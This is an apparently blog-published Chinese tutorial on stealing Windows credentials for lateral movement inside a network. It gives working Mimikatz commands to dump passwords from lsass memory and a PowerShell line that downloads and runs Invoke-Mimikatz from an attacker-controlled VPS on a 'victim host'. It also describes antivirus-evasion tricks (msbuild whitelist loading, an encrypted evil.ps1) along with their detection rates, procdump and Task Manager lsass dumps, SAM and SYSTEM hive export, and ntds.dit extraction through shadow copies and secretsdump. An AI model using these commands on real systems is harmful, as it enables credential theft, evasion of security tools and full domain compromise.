【内网渗透基础】内网横向-主机凭据获取

1.1 Mimikatz抓取

Mimikatz是由法国安全研究员 Benjamin Delpy 开发的一款开源工具，最初用于演示 Windows 身份认证机制（如 NTLM、Kerberos）的安全漏洞。通过它可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码

lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略，通常我们在登陆系统时输入密码之后，密码便会储存在 lsass内存中，经过其 wdigest 和 tspkg 两个模块调用后，对其使用可逆的算法进行加密并存储在内存之中， 而 mimikatz 正是通过对lsass逆算获取到明文密码

需要注意的是，Mimikatz在低版本的系统win10和2012R2以下版本中可以抓取到明文密码，但是在win10和2012R2及以上的版本中默认禁止存储明文密码了

下载地址：

https://github.com/gentilkiwi/mimikatz/releases

cls：       清屏standard：  标准模块，基本命令crypto：    加密相关模块sekurlsa：  与证书相关的模块kerberos：  kerberos模块privilege： 提权相关模块process：   进程相关模块serivce：   服务相关模块lsadump：   LsaDump模块ts：        终端服务器模块event：     事件模块misc：      杂项模块token：     令牌操作模块vault：     Windows 、证书模块minesweeper：Mine Sweeper模块dpapi：     DPAPI模块（通过API或RAW访问）[数据保护应用程序编程接口]busylight： BusyLight Modulesysenv：    系统环境值模块sid：       安全标识符模块iis：       IIS XML配置模块rpc：       mimikatz的RPC控制sr98：      用于SR98设备和T5577目标的RF模块rdm：       RDM（830AL）器件的射频模块acr：       ACR模块version：   查看版本exit：      退出

抓取明文密码

privilege::debug          提升至DebugPrivilege权限sekurlsa::logonpasswords  导出用户凭据

1.2 powershell远程加载

Invoke-Mimikatz.ps1下载地址：

https://raw.githubusercontent.com/TideSec/BypassAntiVirus/refs/heads/master/tools/mimikatz/Invoke-Mimikatz.ps1

将powershell脚本放到自己的VPS上

然后在受害主机上运行

powershell.exe -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal "IEX(New-Object Net.WebClient).DownloadString('http://vps-ip/Invoke-Mimikatz.ps1');Invoke-Mimikatz"

需要注意的是像mimikatz这种常见的渗透工具早已经被各大安全厂商加入了特征库

一般传上去即被杀很容易暴露攻击行为，实战中需要做一下简单的免杀

1.3 Mimikatz简单的免杀版

原文链接：

https://blog.csdn.net/2301_76786857/article/details/140174818

方法1-白名单msbuild.exe加载(VT查杀率4/59)

下载mimikatz.xml

https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/executes-mimikatz.xml

执行

C:WindowsMicrosoft.NETFramework64v4.0.30319msbuild.exe executes-mimikatz.xml

virustotal.com上executes-mimikatz.xml查杀率为4/59。

方法2-使用Out-EncryptedScript加密(VT查杀率0/60)

Powersploit中提供的很多工具都是做过加密处理的，同时也提供了一些用来加密处理的脚本，Out-EncryptedScript就是其中之一。

首先在本地对Invoke-Mimikatz.ps1进行加密处理：

先下载Out-EncryptedScript.ps1脚本，下载地址：https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/Out-EncryptedScript.ps1

在自己的电脑上依次执行

powershell.exeImport-Module .Out-EncryptedScript.ps1Out-EncryptedScript -ScriptPath .Invoke-M

默认会生成的evil.ps1文件。其中两个参数：-Password 设置加密的密钥-Salt 随机数，防止被暴力破解

将加密生成的evil.ps1脚本放在目标机上，执行如下命令：

[String] $cmd = Get-Content .evil.ps1Invoke-Expression $cmd$decrypted = de tidesec 123456Invoke-Expression $decryptedInvoke-Mimikatz

virustotal.com上evil.ps1文件查杀率为0/60。

混子Hacker

02

离线导出lsass.exe密码

2.1 lsass.exe转存储

打开任务管理器找到lsass.exe

右键选择创建转储文件

使用Mimikatz.exe读取lsass.DMP

sekurlsa::minidump lsass.DMPsekurlsa::logonPasswords full

2.2 procdump导出dmp

在目标机器执行下面命令，导出lsass.dmp

procdump.exe -accepteula -ma lsass.exe lsass.dmp

再使用mimikatz读取密码

sekurlsa::minidump lsass.dmpsekurlsa::logonPasswords full


需要注意的是从目标机器导出的lsass.dmp需要在相同系统下运行。

混子Hacker

03

SAM数据库提取HASH

SAM(安全账户管理器)数据库存储本地账户的NTLM哈希，位于注册表中，由SYSTEM密钥保护。

导出SAM、SYSTEM和SECURITY文件

reg save HKLMSAM sam.savereg save HKLMSYSTEM system.savereg save HKLMSECURITY security.save

使用Mimikatz提取HASH

lsadump::sam /sam:sam.save /system:system.save

hash值可以拿去破解网站尝试破解

混子Hacker

04

卷影拷贝提取ntds.dit

ntds.dit是一个二进制文件，存储位置为域控制器的%SystemRoot%ntdsntds.dit是一个数据库，用于存储Active Directory数据，包括有关用户对象，组和组成员身份的信息。通过提取用户哈希值，可以使用诸如Mimikatz之类的工具执行哈希传递攻击，或使用诸如Hashcat之类的工具来破解这些密码。

运维人员会利用卷影拷贝服务(volume Shadow Copy Server，VSS)实现ntds.dit的拷贝，VSS本质上属快照(Snamshot)技术的一种，主要用于备份和恢复(即使目标文件被系统锁定)

利用vssadmin提取ntds.dit

vssadmin 是Windows Server 2008及 Windows 7提供的VSS管理工具，可用于创建和删除卷影拷贝。

创建C盘的卷影拷贝

vssadmin create shadow /for=c:

在卷影拷贝中将ntds.dit复制出来

copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1windowsntdsntds.dit c:ntds.dit

删除快照

vssadmin delete shadows /for=c: /quiet

最后还需要转储system.hive

system.hive中存放着ntds.dit的密钥，如果没有该密钥，将无法查看ntds.dit中的信息：

利用impacket的secretdump导出ntds.dit域内用户hash

python secretsdump.py -system system.hive -ntds ntds.dit LOCAL

本专栏往期文章： 【内网渗透基础】一、信息收集 【内网渗透基础】二、隧道建立 【内网渗透基础】二、隧道建立（下） 【内网渗透基础】三、权限提升-Windows内核提权 【内网渗透基础】三、权限提升-Windows内核提权（下） 【内网渗透基础】三、权限提升-Windows第三方软件提权 【内网渗透基础】三、权限提升-Linux提权

<<<  END >>>

原文始发于微信公众号（混子Hacker）：【内网渗透基础】内网横向-主机凭据获取